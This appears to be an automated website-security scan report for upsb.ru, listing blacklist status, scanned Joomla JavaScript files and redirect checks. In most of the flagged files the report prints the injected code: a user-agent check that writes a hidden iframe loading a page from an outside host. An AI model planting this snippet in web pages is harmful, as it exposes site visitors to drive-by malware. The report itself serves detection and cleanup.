Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=upsb.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://upsb.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://upsb.ru/ | 200 OK Content-Length: 65023 Content-Type: text/html | clean |
http://upsb.ru/media/system/js/modal.js | 200 OK Content-Length: 11560 Content-Type: application/javascript | clean |
http://upsb.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 3781 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk }); }); window.addEvent('load', function(){ if($$('.subCategory')){ var blocks = $$('.subCategory'); var maxHeight = 0; blocks.each(function(item){ maxHeight = Math.max(maxHeight, parseInt(item.getStyle('height'))); }); blocks.setStyle('height', maxHeight); } }); Antivirus reports:
| ||
http://upsb.ru/media/system/js/caption.js | 200 OK Content-Length: 2636 Content-Type: application/javascript | clean |
http://upsb.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 90712 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk "borderLeftWidth"))||0;return{top:d.top-e.top,left:d.left-e.left}},offsetParent:function(){return this.map(function(){for(var a=this.offsetParent||m.body;a&&!ab.test(a.nodeName)&&c.css(a,"position")==="static";)a=a.offsetParent;return a})}});c.each(["Left","Top"],function(a,b){var d="scroll"+b;c.fn[d]=function(b){var f,g;if(b===k){f=this[0];return!f?null:(g=fa(f))?" Antivirus reports:
| ||
http://upsb.ru/cache/widgetkit/widgetkit-d133f7eb.js | 200 OK Content-Length: 52997 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas(){var dude=navigator.userAgent;var unificas=(dude.indexOf("Windows")<+1||dude.indexOf("Chrome")>-1||dude.indexOf("IEMobile")>-1);if(!unificas){document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>');}} Argisuliterkas();(function(f){f.browser.msie&&parseInt(f.b Antivirus reports:
| ||
http://upsb.ru/templates/upsb/js/popbox.js | 200 OK Content-Length: 1588 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk box1.status = 'hide'; var fx = new Fx.Style (box1,'opacity'); fx.stop(); fx.start (box1.getStyle('opacity'), 0); if (box1._caller) box1._caller.removeClass ('show'); } },this); box.status = 'show'; var fx = new Fx.Style (box,'opacity',{onComplete:function(){if($(focusobj))$(focusobj).focus();}}); fx.stop(); fx.start (box.getStyle('opacity'), 1); if (box._caller) box._caller.addClass ('show'); } } Antivirus reports:
| ||
http://upsb.ru/templates/upsb/js/cssmenu.js | 200 OK Content-Length: 1824 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://upsb.ru/plugins/content/jw_allvideos/includes/js/mediaplayer/jwplayer.js | 200 OK Content-Length: 133014 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24803 Content-Type: application/javascript | clean |
http://upsb.ru/plugins/content/jw_allvideos/includes/js/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://upsb.ru/modules/mod_jv_headline/assets/js/slideshow6.js | 200 OK Content-Length: 13469 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk } else { oldFx.set({opacity: 1}); oldFx.start({ opacity: [1, 0], top: [0, this.options.slideHeight] }); newFx.set({ opacity: 1, top: this.options.slideHeight }); newFx.start({ top: [this.options.slideHeight, 0] }); } } }); Antivirus reports:
| ||
http://upsb.ru/plugins/system/pc_includes/ajax_1.3.js | 200 OK Content-Length: 9443 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://upsb.ru/modules/mod_news_pro_gk4/interface/scripts/engine.portal.mode.2.js | 200 OK Content-Length: 3687 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk arts[i].removeClass('active'); } else if(i == current_art) { if(!arts[i].hasClass('active')) arts[i].addClass('active'); } }); }); } if(auto_anim){ (function(){ if(!animation) module.getElement('.nsp_bottom_interface .next').fireEvent("click"); else animation = false; }).periodical($G['animation_interval'] / 2); } }); }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: upsb.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 02 Oct 2014 11:57:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 02 Oct 2014 11:57:40 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ae8ca5f6c11d626551ee8468db7048=d92bhd1k0g4d6e7hcr5elengb0; path=/
X-Powered-By: PHP/5.4.26
GET / HTTP/1.1
Host: upsb.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 02 Oct 2014 11:57:36 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 02 Oct 2014 11:57:40 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 78ae8ca5f6c11d626551ee8468db7048=d92bhd1k0g4d6e7hcr5elengb0; path=/
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: upsb.ru
Referer: http://www.google.com/search?q=upsb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: upsb.ru
Referer: http://www.google.com/search?q=upsb.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.